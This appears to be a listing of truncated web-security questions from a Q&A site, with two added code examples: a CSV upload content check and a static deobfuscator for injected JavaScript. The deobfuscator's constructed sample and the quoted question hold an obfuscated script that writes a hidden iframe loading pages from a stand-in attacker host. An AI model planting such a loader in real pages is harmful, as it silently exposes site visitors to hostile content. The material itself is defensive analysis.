web-security

An honest security ethics nondisclosure question I need help with.

3 years ago I did a security audit for a large ecommerce website. When the audit was performed, I found several severe security issues that allow access to data that should not be accessible after a transaction is completed. On this site there are several major risks. First, you can see orders coming through the system in real time; all t...

IE scripting security settings

I am working on a tool that accepts an HTML string, downloads any images found in the code and replaces the image sources with the new local URLs. When an image source redirects to another URL, I get an access denied error on the request for it: msxml3.dll error '80070005' Access is denied. (i.e. Original URL is: http://ads.cpafuel....

Checklist of steps to secure asp.net web application?

I would like to secure an ASP.NET web application against hacking. Is there a list of ASP.NET-specific tasks, specifically coding-wise, to make an ASP.NET application more secure? Beyond what is mentioned on MSDN. I am interested in specific steps with code examples on ways to avoid cross-site request forgery & cross-site scripting. I know about u...

Ajax Control Toolkit Editor Control - avoiding XSS attacks

I noticed in this article that Microsoft does not recommend using the Editor control from the Ajax Control Toolkit in public sites because of the danger of cross-site scripting attacks. I tried it out, and even if you specifically set NoScript="true" it's possible to add script, and therefore, introduce XSS attack vulnerabilities. In m...

Why would "/id" as an HTTP GET parameter be a security breach?

Hello everybody, while trying to debug my OpenID implementation with Google, which kept returning Apache 406 errors, I eventually discovered that my hosting company does not allow passing a string containing "/id" as a GET parameter (something like "example.php?anyattribute=%2Fid" once URL-encoded). That's rather annoying as Google ope...

Is it a bad idea to send the hash of a password instead of the unhashed password?

For example, if the user has JavaScript enabled, we hash his password and send the hash. If not, we send the password unhashed and a flag to mark that it is unhashed. We then build the hash (if it's unhashed) and compare it to the stored hash. This seems to be secure and simple. Why isn't it a popular way to send a password? Did I ...

What are the biggest security risks with Ajax, and how can they be mitigated?

I'm curious to know what web developers consider to be the biggest security vulnerabilities with regard to Ajax applications, with or without the popular client frameworks (jQuery et al.), and how they are mitigated. Are there open source or commercial tools that can help identify such problems in a site? ...

How secure is Facebook Connect?

Hi, I am looking into using Facebook Connect as a way for users to log in to my site. However, I've noticed that it doesn't use SSL. Also, I've noticed that it doesn't look like SSL is being used in the main Facebook login area either. My site holds sensitive info about the user and I am concerned that Facebook Connect could make this vulnerab...

Are there any published frameworks or standards for passwords and website membership?

I am currently working on a project in which we are creating a large public website for my organization. This site is going to allow our clients to register and log in to obtain sensitive personal information. From experience I know some of the basics, like requiring a complex password and requiring an email address for a password reset ...

How insecure is the web?

I have just started writing socket programs. I came to know that a single UDP packet has a source port, a destination port and some MAC address representing the router, etc. I wonder why anybody cannot create custom packets with fake information in them and send them over the internet. I would like to know how safe our PCs are. What should be done to secure i...

What is the most secure way to connect an ASP.NET 3.5 web application and SQL Server database?

I have a web application developed in .NET 3.5, and a SQL Server database. The current auth method is a connection string in web.config; it seems like a good idea to move the authentication details out of plain text. So, I have two questions: Trusted Connection - The password policy here is strict, requiring frequent changes. Does this m...

Multiple <security-constraint> not working

I have the following in a GlassFish deployed EAR, which works fine: <security-constraint> <web-resource-collection> <web-resource-name>Secure Pages</web-resource-name> <url-pattern>/restricted/*</url-pattern> <http-method>GET</http-method> <http-method>POST</http-method> </web-resource-collection> ...

Security implications of escaping / reforming html in asp.net (working around validateRequest)

I'm having ASP.NET barf at me when I submit a form with a value like <a_ (underscore is a space). This is bad - at the very least I want to be able to gracefully handle the error; ideally I'd like the user to be able to submit anything they like and have it work as the user expects. I could set validateRequest="false" in the web.c...

how to prevent JS hijacking in public computers

Hi all, this problem is regarding a JS hijacking scenario, and here it is: Say Mr. Good has a website called "iamtooinnocent.com" which loads an "x.js" file to perform some particular tasks, and Mr. Bad is an evil cyber cafe owner, who has set a redirect rule in place so that whenever any surfer using his cyber cafe visits Good's websi...

Upload file type verification with Rails and Javascript

I'm currently working on a project where users can upload datasets in CSV format. Is there a good way with Ruby other than checking file extension to determine if they're really uploading a CSV and not some executable or some other file type? ...
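A content-based check for CSV uploads that does not trust the file extension, as an added example (not code from the question or from any answer to it). It is written for Node.js rather than Ruby so that it can be exercised directly here; the checks themselves (known magic bytes, NUL bytes, markup, then a quote-aware sample parse for consistent column counts) port one for one to Rails. All sample buffers, including the fake executable, are constructed for this example, and the check is a heuristic: it rejects files that are clearly not CSV, it does not prove that a file is one.

```javascript
// Added example, not from the question: content sniffing for CSV uploads.
// Sample inputs below are constructed; nothing here is read from disk.

// Leading bytes of file types that are never a CSV dataset.
const KNOWN_NON_CSV = [
  { name: 'Windows executable (MZ)', bytes: [0x4d, 0x5a] },
  { name: 'ELF binary', bytes: [0x7f, 0x45, 0x4c, 0x46] },
  { name: 'Java class file', bytes: [0xca, 0xfe, 0xba, 0xbe] },
  { name: 'ZIP/Office document', bytes: [0x50, 0x4b, 0x03, 0x04] },
  { name: 'PDF', bytes: [0x25, 0x50, 0x44, 0x46] },
  { name: 'script with shebang', bytes: [0x23, 0x21] },
];

function matchesMagic(buf, bytes) {
  return buf.length >= bytes.length && bytes.every((b, i) => buf[i] === b);
}

// Quote-aware split of one CSV record ("" inside quotes is an escaped quote).
// Returns null when a quote is left open on the line.
function splitCsvRecord(line, delim = ',') {
  const fields = [];
  let cur = '';
  let inQuotes = false;
  for (let i = 0; i < line.length; i++) {
    const c = line[i];
    if (inQuotes) {
      if (c === '"') {
        if (line[i + 1] === '"') { cur += '"'; i++; } else inQuotes = false;
      } else cur += c;
    } else if (c === '"' && cur === '') inQuotes = true;
    else if (c === delim) { fields.push(cur); cur = ''; }
    else cur += c;
  }
  if (inQuotes) return null;
  fields.push(cur);
  return fields;
}

// Returns { ok: true, columns, sampledRows } or { ok: false, reason }.
function checkCsvUpload(buf, { sampleRows = 20, maxSniffBytes = 8192 } = {}) {
  const head = buf.subarray(0, maxSniffBytes);
  for (const sig of KNOWN_NON_CSV) {
    if (matchesMagic(head, sig.bytes)) return { ok: false, reason: `looks like ${sig.name}` };
  }
  if (head.includes(0)) return { ok: false, reason: 'binary content (NUL byte)' };

  let text = head.toString('utf8');
  if (text.charCodeAt(0) === 0xfeff) text = text.slice(1); // strip UTF-8 BOM
  if (/^\s*<(?:!doctype|html|script|\?xml|\?php)/i.test(text)) {
    return { ok: false, reason: 'markup or script, not CSV' };
  }

  const lines = text.split(/\r?\n/).filter((l) => l.length > 0);
  if (buf.length > maxSniffBytes) lines.pop(); // last sampled line may be cut mid-record
  const sample = lines.slice(0, sampleRows);
  if (sample.length === 0) return { ok: false, reason: 'empty file' };

  const counts = [];
  for (const line of sample) {
    const fields = splitCsvRecord(line);
    if (fields === null) return { ok: false, reason: 'unbalanced quote in sampled row' };
    counts.push(fields.length);
  }
  const columns = counts[0];
  if (columns < 2) return { ok: false, reason: 'fewer than 2 columns; not a dataset' };
  if (!counts.every((n) => n === columns)) return { ok: false, reason: 'inconsistent column count' };
  return { ok: true, columns, sampledRows: counts.length };
}

// Constructed samples: a real dataset, a PE header renamed to .csv, an HTML
// page, a ragged file and a file with NUL bytes.
const SAMPLES = {
  dataset: Buffer.from('id,name,score\n1,"Smith, J",42\n2,"O""Brien",17\n'),
  renamedExe: Buffer.concat([Buffer.from('MZ'), Buffer.alloc(62, 0), Buffer.from('not csv\n')]),
  htmlPage: Buffer.from('<html><script>alert(1)</script></html>'),
  ragged: Buffer.from('a,b,c\n1,2\n3,4,5\n'),
  nullBytes: Buffer.from([0x61, 0x2c, 0x62, 0x0a, 0x00, 0x2c, 0x00, 0x0a]),
};

for (const [name, buf] of Object.entries(SAMPLES)) {
  console.log(name, checkCsvUpload(buf));
}
```

Run the accepted file through the real CSV parser afterwards and store it with a fixed .csv name and a non-executable content type; the sniff only decides whether parsing is worth attempting.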

JavaScript being injected in my PHP Pages

I have a website, and I just discovered that somehow someone injected JavaScript on my page. How can I figure out what it does and how they did it? <script> var x = unescape("%68% (**** some other hex characters here ****%74%2e%63%6e%2f%76%69%64");document.write("<i"+"fr"+"am"+"e s"+"r"+"c=\""+x+"/ind"+"e"+"x.p"+"hp\" w"+"id"+"th=\"0\" ...
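The first half of that question ("what does it do") can be answered without ever running the script. The following is an added example, not code from the question or from any answer to it: a small static deobfuscator for exactly this pattern, which decodes the unescape() literal, inlines the variable, folds the "a"+"b" string concatenation, and then reads the document.write() payload and the iframe it builds. The sample script it is run on is constructed here, with the fictitious host attacker.example in place of the real destination, which the question elides.

```javascript
// Added example, not from the question: static deobfuscation of the
// unescape()/document.write() injection pattern. Nothing here is evaluated.
// SAMPLE_INJECTED is constructed; attacker.example is a fictitious host.

const SAMPLE_INJECTED =
  '<script>var x = unescape("%68%74%74%70%3a%2f%2f%61%74%74%61%63%6b%65%72' +
  '%2e%65%78%61%6d%70%6c%65%2f%76%69%64");' +
  'document.write("<i"+"fr"+"am"+"e s"+"r"+"c=\\""+x+"/ind"+"e"+"x.p"+' +
  '"hp\\" w"+"id"+"th=\\"0\\" h"+"eig"+"ht=\\"0\\"></i"+"frame>");</script>';

// Same decoding as the legacy unescape(): %XX and %uXXXX sequences.
function jsUnescape(s) {
  return s.replace(/%u([0-9a-fA-F]{4})|%([0-9a-fA-F]{2})/g,
    (m, u, h) => String.fromCharCode(parseInt(u || h, 16)));
}

// Value of a double-quoted JS string body; falls back to plain unescaping
// for escapes JSON does not know.
function jsStringValue(raw) {
  try { return JSON.parse('"' + raw + '"'); } catch (e) { return raw.replace(/\\(.)/g, '$1'); }
}

// unescape("%..") -> "decoded literal"
function decodeUnescapeCalls(src) {
  return src.replace(/unescape\(\s*"([^"]*)"\s*\)/g, (m, lit) => JSON.stringify(jsUnescape(lit)));
}

// var name = "literal"; -> drop the declaration, substitute the value for every
// use of the identifier that is outside a string literal.
function inlineStringVars(src) {
  const vars = new Map();
  src = src.replace(/var\s+(\w+)\s*=\s*"((?:[^"\\]|\\.)*)"\s*;/g, (m, name, lit) => {
    vars.set(name, jsStringValue(lit));
    return '';
  });
  // Alternation: a whole string literal (left untouched) or a bare identifier.
  return src.replace(/"(?:[^"\\]|\\.)*"|\b(\w+)\b/g, (m, ident) =>
    ident !== undefined && vars.has(ident) ? JSON.stringify(vars.get(ident)) : m);
}

// "a" + "b" -> "ab", repeated until nothing is left to fold.
function foldConcats(src) {
  const pair = /"((?:[^"\\]|\\.)*)"\s*\+\s*"((?:[^"\\]|\\.)*)"/g;
  let prev;
  do {
    prev = src;
    src = src.replace(pair, (m, a, b) => '"' + a + b + '"');
  } while (src !== prev);
  return src;
}

// Collects the HTML handed to document.write("...") after folding.
function extractDocumentWrites(src) {
  const out = [];
  const re = /document\.write\(\s*"((?:[^"\\]|\\.)*)"\s*\)/g;
  let m;
  while ((m = re.exec(src)) !== null) out.push(jsStringValue(m[1]));
  return out;
}

function analyzeInjectedScript(html) {
  let src = html.replace(/<\/?script\b[^>]*>/gi, '');
  src = decodeUnescapeCalls(src);
  src = inlineStringVars(src);
  src = foldConcats(src);
  const writes = extractDocumentWrites(src);
  const iframeSrcs = [];
  let hiddenIframe = false;
  for (const w of writes) {
    for (const m of w.matchAll(/<iframe\b[^>]*\bsrc\s*=\s*"([^"]*)"/gi)) iframeSrcs.push(m[1]);
    if (/\b(?:width|height)\s*=\s*"0"/i.test(w)) hiddenIframe = true;
  }
  return { deobfuscated: src, writes, iframeSrcs, hiddenIframe };
}

console.log(analyzeInjectedScript(SAMPLE_INJECTED));
```

The output for the constructed sample is a single document.write of a zero-size iframe pointing at the decoded host, which is the usual shape of this injection; the "how they did it" half of the question needs the server side (file modification times, upload and FTP logs, the page template itself), which no amount of client-side analysis will answer.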

Web application security testing

Hi all, we are developing a web application using the Spring framework and Hibernate ORM. As far as application security is concerned, we are using Acegi to provide authentication and authorization support. Now, about user input sanitization, we have tried to take care of attacks like XSS and SQL injection. We have tried to use as muc...

Testing of Web Security

In your experience, what have you found, worked on, or encountered in terms of site vulnerabilities? And what actions did you take to mitigate these issues? This may include XSS (cross-site scripting), SQL injection attacks, plain old DDoS or phishing attempts on your site's customers. Only yesterday I came across an entire section of ...

Enabling strong ciphers in Tomcat 5.

Hello. I am attempting to refine the suite of ciphers that my webapp allows. In Tomcat's server.xml I have the following connector defined: <Connector port="443" maxHttpHeaderSize="8192" maxThreads="3000" minSpareThreads="250" maxSpareThreads="500" enableLookups="false" disableUploadTimeout="true" acce...

ASP.Net Security: Wrap Requests in IHttpHandler or use RoleProvider?

I'm working with ASP.Net MVC as well as DynamicData and I need to add role-based security. Should I implement this via: IHttpHandler with custom actions that check if the user is authorized? Or should I be using a RoleProvider? Or perhaps some combination of the two? If the RoleProvider is a viable option, when would I ever need t...